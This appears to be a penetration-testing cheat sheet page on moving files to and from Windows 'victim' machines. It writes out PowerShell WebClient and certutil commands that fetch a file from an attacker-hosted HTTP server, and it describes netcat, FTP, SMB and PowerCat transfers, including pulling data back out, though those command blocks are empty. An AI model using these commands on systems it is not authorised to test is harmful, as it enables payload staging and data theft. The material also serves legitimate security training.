search

Windows

Uploading Files to Victims in Windows

1. PowerShell Download File

PowerShell provides a built-in method for downloading files directly from a remote web server.

Attacking Machine Command:

python3 -m http.server 8080

Victim Machine Command:

powershell.exe -c "(New-Object System.NET.WebClient).DownloadFile('http://10.10.10.1:8080/FileToTransfer','C:\Users\test\Desktop\FileToTransfer')"

Explanation: The attacking machine sets up a simple HTTP server using Python, and the victim machine downloads the file using PowerShell’s WebClient object.

2. Certutil

Certutil is a Windows utility that can be leveraged to download files, bypassing certain security mechanisms in place.

Attacking Machine Command:

python3 -m http.server 8080

Victim Machine Command:

certutil.exe -urlcache -split -f http://10.10.10.10:8080/FileToTransfer FileToTransfer

Explanation: The attacker runs a Python HTTP server, and the victim machine uses certutil to download the file.

3. PowerShell IWR (Invoke-WebRequest)

Invoke-WebRequest can be used in PowerShell to download files, similar to wget in Linux.

Attacking Machine Command:

Victim Machine Command:

Explanation: The attacker sets up an HTTP server, and the victim uses PowerShell’s iwr command to download and save the file locally.

4. Netcat

Netcat can be used for transferring files to a victim machine by establishing a network connection.

Victim Machine Command:

Attacking Machine Command:

Explanation: The victim machine listens on port 4444 for incoming data, and the attacker sends the file over to it using nc.

5. FTP

FTP can be used to transfer files between systems. Here’s how to do it using a simple FTP server.

Attacking Machine Command:

Victim Machine Command:

Explanation: The attacker runs an FTP server using twistd, and the victim machine connects to it to download the file.

6. SMB

SMB is commonly used for file sharing in Windows environments. This command allows for transferring files over the SMB protocol.

Attacking Machine Command:

Victim Machine Command:

Explanation: The attacker sets up an SMB server using impacket-smbserver, and the victim copies the file from the SMB share.

hashtag
Downloading Files from Victims in Windows

1. Netcat

Netcat can be used to receive files from a victim machine by listening on a port.

Attacking Machine Command:

Victim Machine Command:

Explanation: The attacker listens on port 4444 for incoming data and receives it from the victim using nc.

2. FTP

FTP can also be used to upload files from the victim machine to the attacker’s machine.

Attacking Machine Command:

Victim Machine Command:

Explanation: The attacker runs an FTP server, and the victim machine uploads the file using FTP commands.

3. SMB

SMB is also useful for downloading files from the victim machine back to the attacker’s system.

Attacking Machine Command:

Victim Machine Command:

Explanation: The attacker sets up an SMB server and the victim machine retrieves the file from the SMB share.

4. PowerCat

PowerCat is a PowerShell-based tool used for networking. It can be used for file transfers in a similar manner to Netcat.

Victim Machine Command:

Attacking Machine Command:

Explanation: The attacker listens on port 4444 for incoming data, and the victim machine uses PowerCat to send the file back over to the attacker.

PreviousLinuxNextCrackMapExec (NetExec)

Last updated